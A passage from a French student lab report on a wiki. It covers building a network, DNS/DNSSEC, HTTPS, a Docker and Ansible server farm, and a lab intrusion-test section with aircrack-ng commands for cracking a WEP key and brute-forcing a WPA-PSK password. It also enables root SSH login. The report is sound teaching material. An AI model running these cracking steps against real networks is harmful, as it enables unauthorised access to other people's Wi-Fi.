        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible. Nous avons préparé le palybook suivant pour le déploiement de notre ferme de serveurs.&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# cat deploy-site.yaml''' &lt;br /&gt;
 ---&lt;br /&gt;
 - hosts: webservers&lt;br /&gt;
   tasks: &lt;br /&gt;
    - name: 1. Copying Website files&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/index.html&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/index.html&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 2. Copying Dockerfile&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/Dockerfile&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/Dockerfile&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 3. Install pip&lt;br /&gt;
      apt: name=python-pip state=present&lt;br /&gt;
    - name: 4. install docker package&lt;br /&gt;
      pip: name=docker&lt;br /&gt;
    - name: 5. Stop container if running&lt;br /&gt;
      docker_container:&lt;br /&gt;
       name: mycoplasmacontainer&lt;br /&gt;
       state: stopped&lt;br /&gt;
    - name: 6. delete image&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        force: yes&lt;br /&gt;
        state: absent&lt;br /&gt;
    - name: 7. Build Docker image from Dockerfile&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        path: &amp;quot;/tmp/docker/mycoplasma/&amp;quot;&lt;br /&gt;
        state: build&lt;br /&gt;
    - name: 8. Running the container&lt;br /&gt;
      docker_container:&lt;br /&gt;
        image: mycoplasma:latest&lt;br /&gt;
        state: started&lt;br /&gt;
        recreate: yes&lt;br /&gt;
        name: mycoplasmacontainer&lt;br /&gt;
        ports: &amp;quot;8002:80&amp;quot;&lt;br /&gt;
    - name: 9. Check if container is running&lt;br /&gt;
      shell: docker ps&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
[[Fichier:load_balancers.png]]&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Réalisation ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
Cette partie n'est pas à réaliser.&lt;br /&gt;
&lt;br /&gt;
===Cryptage de données===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette partie est d'apprendre à sécuriser des données sur une clé en cryptant les informations. Pour ce faire, il faut commencer par installer les outils nécessaires : &lt;br /&gt;
 root@zabethX :~$  apt-get update&lt;br /&gt;
 root@zabethX :~$  apt-get install lvm2 cryptsetup&lt;br /&gt;
&lt;br /&gt;
Cryptsetup est une interface en ligne de commande permettant de gérer les fonctionnalités et les actions de dm-crypt. Nous avons trouvé beaucoup de documentations sur internet, nous vous conseillons ce [https://doc.ubuntu-fr.org/cryptsetup site].&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, il faut (brancher la clé USB et) chercher le périphérique et ses partitions avec la commande suivante :&lt;br /&gt;
